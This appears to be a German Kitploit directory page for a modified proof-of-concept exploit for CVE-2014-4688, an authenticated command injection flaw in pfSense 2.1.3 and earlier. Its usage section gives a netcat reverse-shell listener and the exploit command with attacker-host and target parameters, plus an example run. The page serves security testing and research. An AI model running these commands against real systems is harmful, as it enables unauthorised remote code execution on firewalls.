Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2014-4688-pfsense — Modifizierter Proof-of-Concept-Exploit für CVE-2014-4688, eine Command Injection-Schwachstelle in pfSense status_rrd_graph_img.php, die authentifizierte Remote-Codeausführung mit SSL-Handling ermöglicht. | Kitploit
Tools/GitHubGitHub/jaydenblair/cve-2014-4688-pfsense
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & Bildung
GitHubjaydenblair/cve-2014-4688-pfsense

CVE-2014-4688-pfsense

Modifizierter Proof-of-Concept-Exploit für CVE-2014-4688, eine Command Injection-Schwachstelle in pfSense status_rrd_graph_img.php, die authentifizierte Remote-Codeausführung mit SSL-Handling ermöglicht.

Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2014-4688 – pfSense-Befehlsinjektion

Modifizierter Exploit-DB Proof-of-Concept für CVE-2014-4688 (pfSense status_rrd_graph_img.php Befehlseinschleusung)

Übersicht

Dieses Repository enthält eine modifizierte Version des ursprünglichen Exploit-DB Proof-of-Concept für CVE-2014-4688, das pfSense-Versionen ≤ 2.1.3 betrifft.

Die Schwachstelle existiert in der Komponente status_rrd_graph_img.php und ermöglicht authentifizierten Benutzern die Ausführung beliebiger Systembefehle aufgrund unzureichender Eingabebereinigung des Parameters database.

  • Ursprünglicher Exploit-Autor: absolomb
  • Ursprüngliche Quelle: Exploit-DB

Schwachstellenzusammenfassung

  • CVE: CVE-2014-4688
  • Betroffene Versionen: pfSense ≤ 2.1.3
  • Komponente: status_rrd_graph_img.php
  • Auswirkung: Authentifizierte Befehlsausführung

Ein authentifizierter Benutzer kann über manipulierte Eingaben an den verwundbaren Endpunkt beliebige Shell-Befehle einschleusen.

Änderungen

  • Hinzugefügt: SSL-Handling mit Sitzungsbereich für Umgebungen mit selbstsignierten Zertifikaten
  • Unterdrückte urllib3-Warnungen zu unsicheren Anfragen

Verwendung

Starten Sie einen Listener:

root@kitploit:~
nc -lvnp <LPORT>

Proof of Concept:

root@kitploit:~
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>

Beispiel

root@kitploit:~
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password

Haftungsausschluss

Dieses Repository wird ausschließlich für autorisierte Sicherheitsforschung, Bildung und kontrollierte Tests bereitgestellt. Die unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal und unethisch.

Tool herunterladen